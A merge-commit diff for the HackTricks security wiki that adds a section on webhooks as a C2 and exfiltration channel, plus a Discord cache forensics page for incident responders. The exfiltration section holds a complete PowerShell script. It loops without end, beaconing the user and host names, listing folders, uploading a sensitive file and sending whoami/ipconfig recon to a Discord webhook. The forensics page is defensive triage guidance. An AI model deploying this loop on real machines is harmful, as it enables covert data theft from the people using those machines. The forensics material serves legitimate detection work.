Merge pull request #1410 from HackTricks-wiki/update_Discord_as_a_C2_and_the_cached_evidence_left_behin_20250916_125230

Discord as a C2 and the cached evidence left behind

Author: carlospolop

src/SUMMARY.md

@@ -59,6 +59,7 @@
     - [Decompile compiled python binaries (exe, elf) - Retreive from .pyc](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md)
     - [Browser Artifacts](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md)
     - [Deofuscation vbs (cscript.exe)](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md)
+    - [Discord Cache Forensics](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/discord-cache-forensics.md)
     - [Local Cloud Storage](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md)
     - [Office file analysis](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md)
     - [PDF File analysis](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md)

src/generic-hacking/exfiltration.md

@@ -112,6 +112,93 @@ if __name__ == "__main__":
 ###
 ```
 
+## Webhooks (Discord/Slack/Teams) for C2 & Data Exfiltration
+
+Webhooks are write-only HTTPS endpoints that accept JSON and optional file parts. They’re commonly allowed to trusted SaaS domains and require no OAuth/API keys, making them useful for low-friction beaconing and exfiltration.
+
+Key ideas:
+- Endpoint: Discord uses https://discord.com/api/webhooks/<id>/<token>
+- POST multipart/form-data with a part named payload_json containing {"content":"..."} and optional file part(s) named file.
+- Operator loop pattern: periodic beacon -> directory recon -> targeted file exfil -> recon dump -> sleep. HTTP 204 NoContent/200 OK confirm delivery.
+
+PowerShell PoC (Discord):
+
+```powershell
+# 1) Configure webhook and optional target file
+$webhook = "https://discord.com/api/webhooks/YOUR_WEBHOOK_HERE"
+$target  = Join-Path $env:USERPROFILE "Documents\SENSITIVE_FILE.bin"
+
+# 2) Reuse a single HttpClient
+$client = [System.Net.Http.HttpClient]::new()
+
+function Send-DiscordText {
+    param([string]$Text)
+    $payload = @{ content = $Text } | ConvertTo-Json -Compress
+    $jsonContent = New-Object System.Net.Http.StringContent($payload, [System.Text.Encoding]::UTF8, "application/json")
+    $mp = New-Object System.Net.Http.MultipartFormDataContent
+    $mp.Add($jsonContent, "payload_json")
+    $resp = $client.PostAsync($webhook, $mp).Result
+    Write-Host "[Discord] text -> $($resp.StatusCode)"
+}
+
+function Send-DiscordFile {
+    param([string]$Path, [string]$Name)
+    if (-not (Test-Path $Path)) { return }
+    $bytes = [System.IO.File]::ReadAllBytes($Path)
+    $fileContent = New-Object System.Net.Http.ByteArrayContent(,$bytes)
+    $fileContent.Headers.ContentType = [System.Net.Http.Headers.MediaTypeHeaderValue]::Parse("application/octet-stream")
+    $json = @{ content = ":package: file exfil: $Name" } | ConvertTo-Json -Compress
+    $jsonContent = New-Object System.Net.Http.StringContent($json, [System.Text.Encoding]::UTF8, "application/json")
+    $mp = New-Object System.Net.Http.MultipartFormDataContent
+    $mp.Add($jsonContent, "payload_json")
+    $mp.Add($fileContent, "file", $Name)
+    $resp = $client.PostAsync($webhook, $mp).Result
+    Write-Host "[Discord] file $Name -> $($resp.StatusCode)"
+}
+
+# 3) Beacon/recon/exfil loop
+$ctr = 0
+while ($true) {
+    $ctr++
+    # Beacon
+    $beacon = "━━━━━━━━━━━━━━━━━━`n:satellite: Beacon`n```User: $env:USERNAME`nHost: $env:COMPUTERNAME```"
+    Send-DiscordText -Text $beacon
+
+    # Every 2nd: quick folder listing
+    if ($ctr % 2 -eq 0) {
+        $dirs = @("Documents","Desktop","Downloads","Pictures")
+        $acc = foreach ($d in $dirs) {
+            $p = Join-Path $env:USERPROFILE $d
+            $items = Get-ChildItem -Path $p -ErrorAction SilentlyContinue | Select-Object -First 3 -ExpandProperty Name
+            if ($items) { "`n$d:`n - " + ($items -join "`n - ") }
+        }
+        Send-DiscordText -Text (":file_folder: **User Dirs**`n━━━━━━━━━━━━━━━━━━`n```" + ($acc -join "") + "```")
+    }
+
+    # Every 3rd: targeted exfil
+    if ($ctr % 3 -eq 0) { Send-DiscordFile -Path $target -Name ([IO.Path]::GetFileName($target)) }
+
+    # Every 4th: basic recon
+    if ($ctr % 4 -eq 0) {
+        $who = whoami
+        $ip  = ipconfig | Out-String
+        $tmp = Join-Path $env:TEMP "recon.txt"
+        "whoami:: $who`r`nIPConfig::`r`n$ip" | Out-File -FilePath $tmp -Encoding utf8
+        Send-DiscordFile -Path $tmp -Name "recon.txt"
+    }
+
+    Start-Sleep -Seconds 20
+}
+```
+
+Notes:
+- Similar patterns apply to other collaboration platforms (Slack/Teams) using their incoming webhooks; adjust URL and JSON schema accordingly.
+- For DFIR of Discord Desktop cache artifacts and webhook/API recovery, see:
+
+{{#ref}}
+../generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/discord-cache-forensics.md
+{{#endref}}
+
 ## FTP
 
 ### FTP server (python)
@@ -364,7 +451,10 @@ Then copy-paste the text into the windows-shell and a file called nc.exe will be
 
 - [https://github.com/Stratiz/DNS-Exfil](https://github.com/Stratiz/DNS-Exfil)
 
-{{#include ../banners/hacktricks-training.md}}
-
+## References
 
+- [Discord as a C2 and the cached evidence left behind](https://www.pentestpartners.com/security-blog/discord-as-a-c2-and-the-cached-evidence-left-behind/)
+- [Discord Webhooks – Execute Webhook](https://discord.com/developers/docs/resources/webhook#execute-webhook)
+- [Discord Forensic Suite (cache parser)](https://github.com/jwdfir/discord_cache_parser)
 
+{{#include ../banners/hacktricks-training.md}}

src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md

@@ -80,6 +80,12 @@ Within these directories, most user data can be found in the **Default/** or **C
 - **History**: Contains URLs, downloads, and search keywords. On Windows, [ChromeHistoryView](https://www.nirsoft.net/utils/chrome_history_view.html) can be used to read the history. The "Transition Type" column has various meanings, including user clicks on links, typed URLs, form submissions, and page reloads.
 - **Cookies**: Stores cookies. For inspection, [ChromeCookiesView](https://www.nirsoft.net/utils/chrome_cookies_view.html) is available.
 - **Cache**: Holds cached data. To inspect, Windows users can utilize [ChromeCacheView](https://www.nirsoft.net/utils/chrome_cache_view.html).
+
+  Electron-based desktop apps (e.g., Discord) also use Chromium Simple Cache and leave rich on-disk artifacts. See:
+
+  {{#ref}}
+  discord-cache-forensics.md
+  {{#endref}}
 - **Bookmarks**: User bookmarks.
 - **Web Data**: Contains form history.
 - **Favicons**: Stores website favicons.

src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/discord-cache-forensics.md

@@ -0,0 +1,91 @@
+# Discord Cache Forensics (Chromium Simple Cache)
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+This page summarizes how to triage Discord Desktop cache artifacts to recover exfiltrated files, webhook endpoints, and activity timelines. Discord Desktop is an Electron/Chromium app and uses Chromium Simple Cache on disk.
+
+## Where to look (Windows/macOS/Linux)
+
+- Windows: %AppData%\discord\Cache\Cache_Data
+- macOS: ~/Library/Application Support/discord/Cache/Cache_Data
+- Linux: ~/.config/discord/Cache/Cache_Data
+
+Key on‑disk structures inside Cache_Data:
+- index: Simple Cache index database
+- data_#: Binary cache block files that can contain multiple cached objects
+- f_######: Individual cached entries stored as standalone files (often larger bodies)
+
+Note: Deleting messages/channels/servers in Discord does not purge this local cache. Cached items often remain and their file timestamps align with user activity, enabling timeline reconstruction.
+
+## What can be recovered
+
+- Exfiltrated attachments and thumbnails fetched via cdn.discordapp.com/media.discordapp.net
+- Images, GIFs, videos (e.g., .jpg, .png, .gif, .webp, .mp4, .webm)
+- Webhook URLs (https://discord.com/api/webhooks/…)
+- Discord API calls (https://discord.com/api/vX/…)
+- Helpful for correlating beaconing/exfil activity and hashing media for intel matching
+
+## Quick triage (manual)
+
+- Grep cache for high-signal artifacts:
+  - Webhook endpoints:
+    - Windows: findstr /S /I /C:"https://discord.com/api/webhooks/" "%AppData%\discord\Cache\Cache_Data\*"
+    - Linux/macOS: strings -a Cache_Data/* | grep -i "https://discord.com/api/webhooks/"
+  - Attachment/CDN URLs:
+    - strings -a Cache_Data/* | grep -Ei "https://(cdn|media)\.discord(app)?\.com/attachments/"
+  - Discord API calls:
+    - strings -a Cache_Data/* | grep -Ei "https://discord(app)?\.com/api/v[0-9]+/"
+- Sort cached entries by modified time to build a quick timeline (mtime reflects when the object hit cache):
+  - Windows PowerShell: Get-ChildItem "$env:AppData\discord\Cache\Cache_Data" -File -Recurse | Sort-Object LastWriteTime | Select-Object LastWriteTime, FullName
+
+## Parsing f_* entries (HTTP body + headers)
+
+Files starting with f_ contain HTTP response headers followed by the body. The header block typically ends with \r\n\r\n. Useful response headers include:
+- Content-Type: To infer media type
+- Content-Location or X-Original-URL: Original remote URL for preview/correlation
+- Content-Encoding: May be gzip/deflate/br (Brotli)
+
+Media can be extracted by splitting headers from body and optionally decompressing based on Content-Encoding. Magic-byte sniffing is useful when Content-Type is absent.
+
+## Automated DFIR: Discord Forensic Suite (CLI/GUI)
+
+- Repo: https://github.com/jwdfir/discord_cache_parser
+- Function: Recursively scans Discord’s cache folder, finds webhook/API/attachment URLs, parses f_* bodies, optionally carves media, and outputs HTML + CSV timeline reports with SHA‑256 hashes.
+
+Example CLI usage:
+
+```bash
+# Acquire cache (copy directory for offline parsing), then run:
+python3 discord_forensic_suite_cli \
+  --cache "%AppData%\discord\Cache\Cache_Data" \
+  --outdir C:\IR\discord-cache \
+  --output discord_cache_report \
+  --format both \
+  --timeline \
+  --extra \
+  --carve \
+  --verbose
+```
+
+Key options:
+- --cache: Path to Cache_Data
+- --format html|csv|both
+- --timeline: Emit ordered CSV timeline (by modified time)
+- --extra: Also scan sibling Code Cache and GPUCache
+- --carve: Carve media from raw bytes near regex hits (images/video)
+- Output: HTML report, CSV report, CSV timeline, and a media folder with carved/extracted files
+
+## Analyst tips
+
+- Correlate the modified time (mtime) of f_* and data_* files with user/attacker activity windows to reconstruct a timeline.
+- Hash recovered media (SHA-256) and compare against known-bad or exfil datasets.
+- Extracted webhook URLs can be tested for liveness or rotated; consider adding them to blocklists and retro-hunting proxies.
+- Cache persists after “wiping” on the server side. If acquisition is possible, collect the entire Cache directory and related sibling caches (Code Cache, GPUCache).
+
+## References
+
+- [Discord as a C2 and the cached evidence left behind](https://www.pentestpartners.com/security-blog/discord-as-a-c2-and-the-cached-evidence-left-behind/)
+- [Discord Forensic Suite (CLI/GUI)](https://github.com/jwdfir/discord_cache_parser)
+- [Discord Webhooks – Execute Webhook](https://discord.com/developers/docs/resources/webhook#execute-webhook)
+
+{{#include ../../../banners/hacktricks-training.md}}